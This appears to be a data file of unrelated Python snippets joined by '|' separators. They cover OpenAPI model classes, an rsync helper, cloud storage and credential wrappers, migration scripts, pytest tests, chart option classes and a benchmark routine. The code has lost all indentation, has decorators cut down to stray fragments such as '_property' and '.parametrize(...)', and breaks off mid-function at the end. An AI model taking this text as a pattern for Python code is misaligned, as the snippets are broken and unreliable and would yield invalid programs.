self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes'])
_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.') |
class ChainedGraphicMatcher(GraphicMatcher):
def __init__(self, graphic_matchers: Sequence[GraphicMatcher]):
super().__init__()
self.graphic_matchers = graphic_matchers
def get_graphic_matches(self, semantic_graphic_list: Sequence[SemanticGraphic], candidate_semantic_content_list: Sequence[SemanticContentWrapper]) -> GraphicMatchResult:
current_graphic_match_result = GraphicMatchResult(graphic_matches=[], unmatched_graphics=semantic_graphic_list)
for graphic_matcher in self.graphic_matchers:
if (not current_graphic_match_result.unmatched_graphics):
break
temp_graphic_matches = graphic_matcher.get_graphic_matches(current_graphic_match_result.unmatched_graphics, candidate_semantic_content_list)
if (not temp_graphic_matches.graphic_matches):
continue
current_graphic_match_result = GraphicMatchResult(graphic_matches=(list(current_graphic_match_result.graphic_matches) + list(temp_graphic_matches.graphic_matches)), unmatched_graphics=temp_graphic_matches.unmatched_graphics)
return current_graphic_match_result |
def local_rsync(options, fromdir, todir):
rsyncargs = ['rsync', '--recursive', '--safe-links', '--times', '--perms', '--one-file-system', '--delete', '--chmod=Da+rx,Fa-x,a+r,u+w']
if (not options.no_checksum):
rsyncargs.append('--checksum')
if options.verbose:
rsyncargs += ['--verbose']
if options.quiet:
rsyncargs += ['--quiet']
logging.debug(' '.join((rsyncargs + [fromdir, todir])))
if (subprocess.call((rsyncargs + [fromdir, todir])) != 0):
raise FDroidException() |
class StorageRepositoryClient(_base_repository.BaseRepositoryClient):
def __init__(self, credentials=None, quota_max_calls=None, quota_period=1.0, use_rate_limiter=True, cache_discovery=False, cache=None):
if (not quota_max_calls):
use_rate_limiter = False
self._buckets = None
self._bucket_acls = None
self._default_object_acls = None
self._objects = None
self._object_acls = None
super(StorageRepositoryClient, self).__init__(API_NAME, versions=['v1'], credentials=credentials, quota_max_calls=quota_max_calls, quota_period=quota_period, use_rate_limiter=use_rate_limiter, cache_discovery=cache_discovery, cache=cache)
def buckets(self):
if (not self._buckets):
self._buckets = self._init_repository(_StorageBucketsRepository)
return self._buckets
def bucket_acls(self):
if (not self._bucket_acls):
self._bucket_acls = self._init_repository(_StorageBucketAclsRepository)
return self._bucket_acls
def default_object_acls(self):
if (not self._default_object_acls):
self._default_object_acls = self._init_repository(_StorageDefaultObjectAclsRepository)
return self._default_object_acls
def objects(self):
if (not self._objects):
self._objects = self._init_repository(_StorageObjectsRepository)
return self._objects
def object_acls(self):
if (not self._object_acls):
self._object_acls = self._init_repository(_StorageObjectAclsRepository)
return self._object_acls |
class Script(Revision):
_only_source_rev_file = re.compile('(?!__init__)(.*\\.py)$')
migration_class = None
path = None
def __init__(self, module, migration_class, path):
self.module = module
self.migration_class = migration_class
self.path = path
super(Script, self).__init__(self.migration_class.revision, self.migration_class.revises)
def doc(self):
return re.split('\n\n', self.longdoc)[0]
def longdoc(self):
doc = self.module.__doc__
return (doc.strip() if doc else '')
def log_entry(self):
entry = ('Rev: %s%s%s%s\n' % (self.revision, (' (head)' if self.is_head else ''), (' (branchpoint)' if self.is_branch_point else ''), (' (mergepoint)' if self.is_merge_point else '')))
if self.is_merge_point:
entry += ('Merges: %s\n' % (self._format_down_revision(),))
else:
entry += ('Parent: %s\n' % (self._format_down_revision(),))
if self.is_branch_point:
entry += ('Branches into: %s\n' % format_with_comma(self.nextrev))
entry += ('Path: %s\n' % (self.path,))
entry += ('\n%s\n' % '\n'.join(((' %s' % para) for para in self.longdoc.splitlines())))
return entry
def __str__(self):
return ('%s -> %s%s%s%s, %s' % (self._format_down_revision(), self.revision, (' (head)' if self.is_head else ''), (' (branchpoint)' if self.is_branch_point else ''), (' (mergepoint)' if self.is_merge_point else ''), self.doc))
def _head_only(self, include_doc=False, include_parents=False, tree_indicators=True, head_indicators=True):
text = self.revision
if include_parents:
text = ('%s -> %s' % (self._format_down_revision(), text))
if (head_indicators or tree_indicators):
text += ('%s%s' % ((' (head)' if self._is_real_head else ''), (' (effective head)' if (self.is_head and (not self._is_real_head)) else '')))
if tree_indicators:
text += ('%s%s' % ((' (branchpoint)' if self.is_branch_point else ''), (' (mergepoint)' if self.is_merge_point else '')))
if include_doc:
text += (', %s' % self.doc)
return text
def cmd_format(self, verbose, include_doc=False, include_parents=False, tree_indicators=True):
if verbose:
return self.log_entry
else:
return self._head_only(include_doc, include_parents, tree_indicators)
def _format_down_revision(self):
if (not self.down_revision):
return '<base>'
else:
return format_with_comma(self._versioned_down_revisions)
def _from_filename(cls, scriptdir, filename):
py_match = cls._only_source_rev_file.match(filename)
if (not py_match):
return None
py_filename = py_match.group(1)
py_module = py_filename.split('.py')[0]
__import__(py_module)
module = sys.modules[py_module]
migration_class = getattr(module, 'Migration', None)
if (migration_class is None):
for v in module.__dict__.values():
if isinstance(v, Migration):
migration_class = v
break
return Script(module, migration_class, os.path.join(scriptdir.path, filename)) |
.parametrize('predictors_only,expected_X,expected_y', [(True, (1309, 8), (1309,)), (False, (1309, 13), (1309,))])
def test_return_X_y(predictors_only, expected_X, expected_y):
(X, y) = load_titanic(return_X_y_frame=True, predictors_only=predictors_only)
assert (X.shape == expected_X)
assert (y.shape == expected_y) |
('src', [{'_target_': 'tests.instantiate.Adam'}])
def test_instantiate_adam(instantiate_func: Any, config: Any) -> None:
with raises(InstantiationException, match="Error in call to target 'tests\\.instantiate\\.Adam':\\nTypeError\\(.*\\)"):
instantiate_func(config)
adam_params = Parameters([1, 2, 3])
res = instantiate_func(config, params=adam_params)
assert (res == Adam(params=adam_params)) |
def main():
args = parse_commandline()
pod_deployment: Optional[K8sPodDeployment] = None
if args.from_file:
pod_deployment = K8sPodDeployment([Path(args.from_file)], None)
else:
dargs: List[Any] = [args.key, args.port, args.delegate_port, args.monitoring_port]
dargs.append((args.entry_peers_maddrs if (args.entry_peers_maddrs is not None) else ''))
docker_config: List[str] = []
if args.docker_fetchai_defaults_dev:
docker_config = [DOCKER_FETCHAI_DEFAULT_FILE_DEV, DOCKER_FETCHAI_DEFAULT_CTX_DEV, DOCKER_FETCHAI_DEFAULT_IMG, DOCKER_FETCHAI_DEFAULT_REGISTRY]
elif args.docker_fetchai_defaults:
docker_config = [DOCKER_FETCHAI_DEFAULT_FILE, DOCKER_FETCHAI_DEFAULT_CTX, DOCKER_FETCHAI_DEFAULT_IMG, DOCKER_FETCHAI_DEFAULT_REGISTRY]
if (args.docker_file is not None):
docker_config[0] = args.docker_file
if (args.docker_ctx is not None):
docker_config[1] = args.docker_ctx
if (args.docker_image is not None):
docker_config[2] = args.docker_image
if (args.docker_registry is not None):
docker_config[3] = args.docker_registry
dargs.extend(docker_config)
k8s_config: List[str] = []
if args.k8s_fetchai_defaults:
k8s_config = [K8S_FETCHAI_DEFAULT_PUBLIC_HOST, K8S_FETCHAI_DEFAULT_NAMESPACE, K8S_FETCHAI_DEFAULT_PUBLIC_TEMPLATE_DIR]
if (args.k8s_public_hostname is not None):
k8s_config[0] = args.k8s_public_hostname
if (args.k8s_namespace is not None):
k8s_config[1] = args.k8s_namespace
if (args.k8s_template_files_dir is not None):
k8s_config[2] = args.k8s_template_files_dir
dargs.extend(k8s_config)
pod_deployment = AcnK8sPodConfig(dargs[0], dargs[1], dargs[2], dargs[3], dargs[4], dargs[5], dargs[6], dargs[7], dargs[8], dargs[9], dargs[10], dargs[11], k8s_number_of_replicas=args.number_of_replicas).generate_deployment()
if args.generate_only:
return
try:
if args.delete_deployment:
pod_deployment.delete()
else:
pod_deployment.deploy()
except Exception as e:
raise e |
def extractLewdtranslationBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Everyone can do it! The Instant Love Switch', 'Everyone can do it! The Instant Love Switch', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_transformer_pipeline_tagger_senter_listener():
orig_config = Config().from_str(cfg_string)
nlp = util.load_model_from_config(orig_config, auto_fill=True, validate=True)
assert (nlp.pipe_names == ['transformer', 'tagger', 'senter'])
tagger = nlp.get_pipe('tagger')
transformer = nlp.get_pipe('transformer')
tagger_trf = tagger.model.get_ref('tok2vec').layers[0]
assert isinstance(transformer, Transformer)
assert isinstance(tagger_trf, TransformerListener)
train_examples = []
for t in TRAIN_DATA:
train_examples.append(Example.from_dict(nlp.make_doc(t[0]), t[1]))
for tag in t[1]['tags']:
tagger.add_label(tag)
optimizer = nlp.initialize((lambda : train_examples))
assert (tagger_trf in transformer.listeners)
for i in range(2):
losses = {}
nlp.update(train_examples, sgd=optimizer, losses=losses)
text = "We're interested at underwater basket weaving."
doc = nlp(text)
doc_tensor = tagger_trf.predict([doc])
_assert_equal_tensors(doc._.trf_data.tensors, doc_tensor[0].tensors)
with make_tempdir() as d:
file_path = (d / 'trained_nlp')
nlp.to_disk(file_path)
nlp2 = util.load_model_from_path(file_path)
doc2 = nlp2(text)
tagger2 = nlp2.get_pipe('tagger')
tagger_trf2 = tagger2.model.get_ref('tok2vec').layers[0]
doc_tensor2 = tagger_trf2.predict([doc2])
_assert_equal_tensors(doc_tensor2[0].tensors, doc_tensor[0].tensors)
file_path_2 = (d / 'trained_nlp_2')
nlp2.to_disk(file_path_2)
nlp_bytes = nlp.to_bytes()
nlp3 = util.load_model_from_config(orig_config, auto_fill=True, validate=True)
nlp3.from_bytes(nlp_bytes)
doc3 = nlp3(text)
tagger3 = nlp3.get_pipe('tagger')
tagger_trf3 = tagger3.model.get_ref('tok2vec').layers[0]
doc_tensor3 = tagger_trf3.predict([doc3])
_assert_equal_tensors(doc_tensor3[0].tensors, doc_tensor[0].tensors) |
class FileDialogDemo(HasTraits):
file_name = File()
open = Button('Open...')
traits_view = View(HGroup(Item('open', show_label=False), '_', Item('file_name', style='readonly', springy=True)), width=0.5)
def _open_changed(self):
file_name = open_file(extensions=LineCountInfo(), id=demo_id)
if (file_name != ''):
self.file_name = file_name |
def parse_css(cspace: Space, string: str, start: int=0, fullmatch: bool=True, color: bool=False) -> (tuple[(tuple[(Vector, float)], int)] | None):
target = cspace.SERIALIZE
if (not target):
target = (cspace.NAME,)
tokens = tokenize_css(string, start=start)
if (not tokens):
return None
if (tokens['id'] not in target):
return None
if (fullmatch and (tokens['end'] < len(string))):
return None
end = tokens['end']
if (('func' in tokens) and (tokens['func']['name'] == 'color')):
if (color is False):
return None
result = parse_color(tokens, cspace)
if (result is None):
return result
return (result, end)
elif (tokens['id'] == 'srgb'):
if ('hex' in tokens):
return (parse_hex(tokens['hex']['value']), end)
elif ('name' in tokens):
values = color_names.from_name(tokens['name']['color'])
return ((values[:(- 1)], values[(- 1)]), end)
else:
return (parse_rgb_channels([v['value'] for v in tokens['func']['values']], cspace.CHANNELS), end)
elif (tokens['id'] in ('--hsl', '--hwb')):
return (parse_channels([v['value'] for v in tokens['func']['values']], cspace.CHANNELS, scaled=True), end)
else:
return (parse_channels([v['value'] for v in tokens['func']['values']], cspace.CHANNELS), end) |
class ModelSerializerOptions(SerializerOptions):
def __init__(self, meta):
super(ModelSerializerOptions, self).__init__(meta)
self.model = getattr(meta, 'model', None)
self.read_only_fields = getattr(meta, 'read_only_fields', ())
self.write_only_fields = getattr(meta, 'write_only_fields', ()) |
def benchmark_vae(pt_vae, batch_size=1, height=64, width=64, benchmark_pt=False, verify=False):
latent_channels = 4
exe_module = Model('./tmp/AutoencoderKL/test.so')
if (exe_module is None):
print('Error!! Cannot find compiled module for AutoencoderKL.')
exit((- 1))
pt_vae = pt_vae.cuda().half()
pt_vae.eval()
pt_input = torch.rand([batch_size, latent_channels, height, width]).cuda().half()
print('pt_input shape', pt_input.shape)
with autocast('cuda'):
pt_output = pt_vae.decode(pt_input).sample
pt_output = pt_output.half()
if benchmark_pt:
args = (pt_input,)
pt_time = benchmark_torch_function(100, pt_vae.decode, *args)
print(f'PT batch_size: {batch_size}, {pt_time} ms')
with open('sd_pt_benchmark.txt', 'a') as f:
f.write(f'''vae batch_size: {batch_size}, latency: {pt_time} ms
''')
y = torch.empty(pt_output.size(0), pt_output.size(2), pt_output.size(3), pt_output.size(1)).cuda().half()
ait_input_pt_tensor = torch.permute(pt_input, (0, 2, 3, 1)).contiguous()
exe_module.run_with_tensors([ait_input_pt_tensor], [y])
if verify:
y_pt = torch.permute(y, (0, 3, 1, 2))
eps = 0.1
np.testing.assert_allclose(pt_output.detach().cpu().numpy(), y_pt.cpu().numpy(), atol=eps, rtol=eps)
logging.info('VAE Verification done!')
exe_module.benchmark_with_tensors([ait_input_pt_tensor], [y], count=100, repeat=4)
(t, _, _) = exe_module.benchmark_with_tensors([ait_input_pt_tensor], [y], count=100, repeat=4)
with open('sd_ait_benchmark.txt', 'a') as f:
f.write(f'''vae batch_size: {batch_size}, latency: {t} ms
''') |
def execute_workflow(ert: EnKFMain, storage: StorageAccessor, workflow_name: str) -> None:
logger = logging.getLogger(__name__)
try:
workflow = ert.ert_config.workflows[workflow_name]
except KeyError:
msg = 'Workflow {} is not in the list of available workflows'
logger.error(msg.format(workflow_name))
return
runner = WorkflowRunner(workflow, ert, storage)
runner.run_blocking()
if (not all((v['completed'] for v in runner.workflowReport().values()))):
logger.error(f'Workflow {workflow_name} failed!') |
.benchmark
('xtb')
.parametrize('fn, geoms, charge, mult, ref_energy', Bh.geom_iter)
def test_xtb_rx(fn, geoms, charge, mult, ref_energy, results_bag):
(start, ts_ref_org, end) = geoms
id_ = fn[:2]
with tempfile.TemporaryDirectory() as tmp_dir:
tmp_path = Path(tmp_dir)
inp_ts = str((tmp_path / 'ts_input.trj'))
with open(inp_ts, 'w') as handle:
handle.write(ts_ref_org.as_xyz())
ts_run_dict = {'geom': {'type': 'redund', 'fn': inp_ts}, 'calc': {'type': 'xtb', 'pal': 6, 'mem': 750, 'charge': charge, 'mult': mult, 'quiet': True}, 'tsopt': {'type': 'rsirfo', 'hessian_recalc': 1, 'trust_max': 0.3, 'thresh': 'gau', 'do_hess': True}}
ts_results = run_from_dict(ts_run_dict)
ts_ref = ts_results.ts_geom
ts_ref_energy = ts_ref.energy
ts_ref_imag = ts_ref.get_imag_frequencies()[0]
with tempfile.TemporaryDirectory() as tmp_dir:
tmp_path = Path(tmp_dir)
inp_trj = str((tmp_path / 'gs_inputs.trj'))
write_geoms_to_trj((start, end), inp_trj)
run_dict = {'geom': {'type': 'dlc', 'fn': inp_trj}, 'calc': {'type': 'xtb', 'pal': 1, 'mem': 750, 'charge': charge, 'mult': mult}, 'preopt': {'max_cycles': 5}, 'cos': {'type': 'gs', 'climb': True, 'climb_rms': 0.0075, 'reset_dlc': True}, 'opt': {'type': 'string', 'max_step': 0.2, 'rms_force': 0.005, 'rms_force_only': True}, 'tsopt': {'type': 'rsirfo', 'thresh': 'gau', 'trust_max': 0.5, 'do_hess': True}}
if (id_ == '02'):
run_dict['geom']['type'] = 'cart'
elif (id_ == '19'):
run_dict['opt']['rms_force'] = 0.003
results = run_from_dict(run_dict)
ts_geom = results.ts_geom
ts_energy = ts_geom.energy
ts_imag = ts_geom.get_imag_frequencies()[0]
opt = results.opt
ts_opt = results.ts_opt
rmsd = ts_ref.rmsd(ts_geom)
diff = (ts_ref_energy - ts_energy)
cmt = ('Ref' if (diff < 0.0) else ' TS')
rmsd_fmt = ' >12.4f'
print(f'RMSD: {rmsd:{rmsd_fmt}}')
print(f' TS energy: {ts_energy:.6f}')
print(f'Ref energy: {ts_ref_energy:.6f}')
print(f' Diff: {diff:.6f}')
print(f'{id_} : rmsd={rmsd:{rmsd_fmt}}, E= {diff: .6f} {cmt} is lower, fn={fn[:10]}, cycs: opt={(opt.cur_cycle + 1): >2d}, tsopt={(ts_opt.cur_cycle + 1): >2d}')
results_bag.opt_converged = opt.is_converged
results_bag.opt_cycles = (opt.cur_cycle + 1)
results_bag.tsopt_cycles = (ts_opt.cur_cycle + 1)
results_bag.rmsd = rmsd
assert results.ts_opt.is_converged
shutil.copy('ts_opt.xyz', f'{id_}_ts_opt.xyz')
ts_ref_org.comment = 'TS ref org'
ts_ref.comment = 'TS ref opt'
ts_geom.comment = 'TS opt from cos'
ts_geoms = (ts_ref_org, ts_ref, ts_geom)
align_geoms(ts_geoms)
ts_fns = f'{id_}_ts_geoms.trj'
write_geoms_to_trj(ts_geoms, ts_fns) |
def merge_in_fixed_mismatch():
test_data = load_test_data(only_mismatch=True)
count = 0
mismatch = 0
remlines = []
good_lines = []
good_sets = []
for (key, value) in test_data:
p = TPN(key)
(vol, chp, frag, post) = (p.getVolume(), p.getChapter(), p.getFragment(), p.getPostfix())
(e_vol, e_chp, e_frag, e_post) = value
if ((vol != e_vol) or (chp != e_chp) or (frag != e_frag) or (e_post != post)):
(badtmp, remline) = format_double_row(key, output_volume=e_vol, output_chapter=e_chp, output_fragment=e_frag, output_postfix=e_post, expect_volume=vol, expect_chapter=chp, expect_fragment=frag, expect_postfix=post)
remlines.append(remline)
else:
goodtmp = format_row(key, e_vol, e_chp, e_frag, e_post)
good_lines.append(goodtmp)
good_sets.append((key, value))
count += 1
print('{} Items with parsed output'.format(count))
print('{} Items mismatch in new parser'.format(len(remlines)))
print('{} OK lines'.format(len(good_lines)))
print('Total items: {}'.format(len(test_data)))
if good_lines:
comment_mismatches(good_lines, mismatch=True)
create_set_files_for_values(good_sets) |
class ModelMeta(type):
def __new__(cls, name, bases, attrs):
model_class = super().__new__(cls, name, bases, attrs)
if ('registry' in attrs):
model_class.database = attrs['registry'].database
attrs['registry'].models[name] = model_class
if ('tablename' not in attrs):
setattr(model_class, 'tablename', name.lower())
for (name, field) in attrs.get('fields', {}).items():
setattr(field, 'registry', attrs.get('registry'))
if field.primary_key:
model_class.pkname = name
return model_class
def table(cls):
if (not hasattr(cls, '_table')):
cls._table = cls.build_table()
return cls._table
def columns(cls) -> sqlalchemy.sql.ColumnCollection:
return cls._table.columns |
class OptionSeriesBellcurveSonificationPointgrouping(Options):
def algorithm(self):
return self._config_get('minmax')
def algorithm(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def groupTimespan(self):
return self._config_get(15)
def groupTimespan(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get('y')
def prop(self, text: str):
self._config(text, js_type=False) |
class OptionPlotoptionsAreaSonificationContexttracksMappingPan(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class RefreshingCredentials():
def __init__(self, client_id: str, client_secret: str=None, redirect_uri: str=None, sender: Sender=None):
self.credentials = Credentials(client_id, client_secret, redirect_uri, sender, asynchronous=False)
def __repr__(self):
options = [f'client_id={self.credentials.client_id!r}', f'client_secret={self.credentials.client_secret!r}', f'redirect_uri={self.credentials.redirect_uri!r}', f'sender={self.credentials.sender!r}']
return (((type(self).__name__ + '(') + ', '.join(options)) + ')')
def request_client_token(self) -> RefreshingToken:
token = self.credentials.request_client_token()
return RefreshingToken(token, self.credentials)
def user_authorisation_url(self, scope=None, state: str=None, show_dialog: bool=False) -> str:
return self.credentials.user_authorisation_url(scope, state, show_dialog)
def request_user_token(self, code: str) -> RefreshingToken:
token = self.credentials.request_user_token(code)
return RefreshingToken(token, self.credentials)
def refresh_user_token(self, refresh_token: str) -> RefreshingToken:
token = self.credentials.refresh_user_token(refresh_token)
return RefreshingToken(token, self.credentials)
def pkce_user_authorisation(self, scope=None, state: str=None, verifier_bytes: int=32) -> Tuple[(str, str)]:
return self.credentials.pkce_user_authorisation(scope, state, verifier_bytes)
def request_pkce_token(self, code: str, verifier: str) -> RefreshingToken:
token = self.credentials.request_pkce_token(code, verifier)
return RefreshingToken(token, self.credentials)
def refresh_pkce_token(self, refresh_token: str) -> RefreshingToken:
token = self.credentials.refresh_pkce_token(refresh_token)
return RefreshingToken(token, self.credentials) |
def calculate_regression_performance(dataset: pd.DataFrame, columns: DatasetColumns, error_bias_prefix: str) -> RegressionPerformanceMetrics:
target_column = columns.utility_columns.target
prediction_column = columns.utility_columns.prediction
num_feature_names = columns.num_feature_names
cat_feature_names = columns.cat_feature_names
if ((target_column is None) or (prediction_column is None)):
raise ValueError('Target and prediction should be present')
_prepare_dataset(dataset, target_column, prediction_column)
quality_metrics = _calculate_quality_metrics(dataset, prediction_column, target_column)
err_quantiles = error_with_quantiles(dataset, prediction_column, target_column, quantile=0.05)
quality_metrics['error_normality'] = _calculate_error_normality(err_quantiles)
quality_metrics['underperformance'] = _calculate_underperformance(err_quantiles)
quality_metrics['error_bias'] = {}
feature_bias = error_bias_table(dataset, err_quantiles, num_feature_names, cat_feature_names)
quality_metrics['error_bias'] = {feature: dict(feature_type=bias.feature_type, **bias.as_dict(error_bias_prefix)) for (feature, bias) in feature_bias.items()}
return RegressionPerformanceMetrics(**quality_metrics) |
def test_slurm_error_mocked(tmp_path: Path) -> None:
with mocked_slurm() as mock:
executor = slurm.SlurmExecutor(folder=tmp_path)
executor.update_parameters(time=24, gpus_per_node=0)
job = executor.submit(test_core.do_nothing, 1, 2, error=12)
with mock.job_context(job.job_id):
with pytest.raises(ValueError):
submission.process_job(job.paths.folder)
_mock_log_files(job, errors='This is the error log\n')
with pytest.raises(utils.FailedJobError):
job.result()
exception = job.exception()
assert isinstance(exception, utils.FailedJobError) |
def test_univariate_integrate(univariate_data):
x = univariate_data.x
y = univariate_data.y
integral_expected = univariate_data.integral
spline = csaps.CubicSmoothingSpline(x, y, smooth=None).spline
integral = spline.integrate(x[0], x[(- 1)])
assert (integral == pytest.approx(integral_expected)) |
class FlytekitPlugin():
def get_remote(config: Optional[str], project: str, domain: str, data_upload_location: Optional[str]=None) -> FlyteRemote:
cfg_file = get_config_file(config)
if (cfg_file is None):
cfg_obj = Config.for_sandbox()
logger.info('No config files found, creating remote with sandbox config')
else:
cfg_obj = Config.auto(config)
logger.info((f'Creating remote with config {cfg_obj}' + (f' with file {config}' if config else '')))
return FlyteRemote(cfg_obj, default_project=project, default_domain=domain, data_upload_location=data_upload_location)
def configure_pyflyte_cli(main: Group) -> Group:
return main
def secret_requires_group() -> bool:
return True |
class LoggingSplunkAdditional(ModelNormal):
allowed_values = {}
validations = {}
_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
_property
def openapi_types():
lazy_import()
return {'url': (str,), 'token': (str,), 'use_tls': (LoggingUseTls,)}
_property
def discriminator():
return None
attribute_map = {'url': 'url', 'token': 'token', 'use_tls': 'use_tls'}
read_only_vars = {}
_composed_schemas = {}
_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes'])
_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.') |
class AssistanceDownloadValidator(DownloadValidatorBase):
name = 'assistance'
def __init__(self, request_data: dict):
super().__init__(request_data)
self.tinyshield_models.extend([{'key': 'award_id', 'name': 'award_id', 'type': 'any', 'models': [{'type': 'integer'}, {'type': 'text', 'text_type': 'raw'}], 'optional': False, 'allow_nulls': False}, {'name': 'limit', 'key': 'limit', 'type': 'integer', 'min': 0, 'max': settings.MAX_DOWNLOAD_LIMIT, 'default': settings.MAX_DOWNLOAD_LIMIT}])
self._json_request = request_data
self._json_request = self.get_validated_request()
(award_id, _, fain, uri, generated_unique_award_id) = _validate_award_id(self._json_request.pop('award_id'))
filters = {'award_id': award_id, 'award_type_codes': tuple(set(assistance_type_mapping))}
award = fain
if ('AGG' in generated_unique_award_id):
award = uri
self._json_request.update({'account_level': 'treasury_account', 'download_types': ['assistance_transactions', 'sub_grants', 'assistance_federal_account_funding'], 'include_file_description': {'source': settings.ASSISTANCE_DOWNLOAD_README_FILE_PATH, 'destination': 'AssistanceAwardSummary_download_readme.txt'}, 'award_id': award_id, 'assistance_id': award, 'is_for_idv': False, 'is_for_contract': False, 'is_for_assistance': True, 'filters': filters, 'include_data_dictionary': True}) |
class NameCitationModelNestedBluePrint(SegmentedModelNestedBluePrint):
def __init__(self, *args, reference_segmenter_model: Model, citation_model: Model, **kwargs):
super().__init__(*args, **kwargs)
self.reference_segmenter_model = reference_segmenter_model
self.citation_model = citation_model
def iter_filter_layout_document(self, layout_document: LayoutDocument) -> Iterable[LayoutDocument]:
references_layout_document = self.filter_layout_document_by_segmentation_label(layout_document, '<references>')
labeled_layout_tokens = self.reference_segmenter_model.predict_labels_for_layout_document(references_layout_document, app_features_context=self.app_features_context)
LOGGER.debug('labeled_layout_tokens: %r', labeled_layout_tokens)
semantic_raw_references = list(SemanticMixedContentWrapper(list(self.reference_segmenter_model.iter_semantic_content_for_labeled_layout_tokens(labeled_layout_tokens))).iter_by_type(SemanticRawReference))
LOGGER.info('semantic_raw_references count: %d', len(semantic_raw_references))
raw_reference_documents = [LayoutDocument.for_blocks([semantic_raw_reference.view_by_type(SemanticRawReferenceText).merged_block]).remove_empty_blocks() for semantic_raw_reference in semantic_raw_references]
citation_labeled_layout_tokens_list = self.citation_model.predict_labels_for_layout_documents(raw_reference_documents, app_features_context=self.app_features_context)
raw_authors = [raw_author for citation_labeled_layout_tokens in citation_labeled_layout_tokens_list for ref in self.citation_model.iter_semantic_content_for_labeled_layout_tokens(citation_labeled_layout_tokens) if isinstance(ref, SemanticReference) for raw_author in ref.iter_by_type(SemanticRawAuthors)]
return [LayoutDocument.for_blocks([raw_author.merged_block]).remove_empty_blocks() for raw_author in raw_authors] |
('calling_file, calling_module', [('tests/test_apps/app_without_config/my_app.py', None), (None, 'tests.test_apps.app_without_config.my_app')])
def test_app_without_config__with_append(hydra_restore_singletons: Any, hydra_task_runner: TTaskRunner, calling_file: str, calling_module: str) -> None:
with hydra_task_runner(calling_file=calling_file, calling_module=calling_module, config_path='', config_name=None, overrides=['+abc=123', '+a.b=1', '+a.a=2'], configure_logging=True) as task:
assert ((task.job_ret is not None) and (task.job_ret.cfg == dict(abc=123, a=dict(b=1, a=2))))
verify_dir_outputs(task.job_ret, task.overrides) |
def int3c2e3d_sph_101(ax, da, A, bx, db, B, cx, dc, C):
result = numpy.zeros((3, 1, 3), dtype=float)
x0 = (ax + bx)
x1 = (x0 ** (- 1.0))
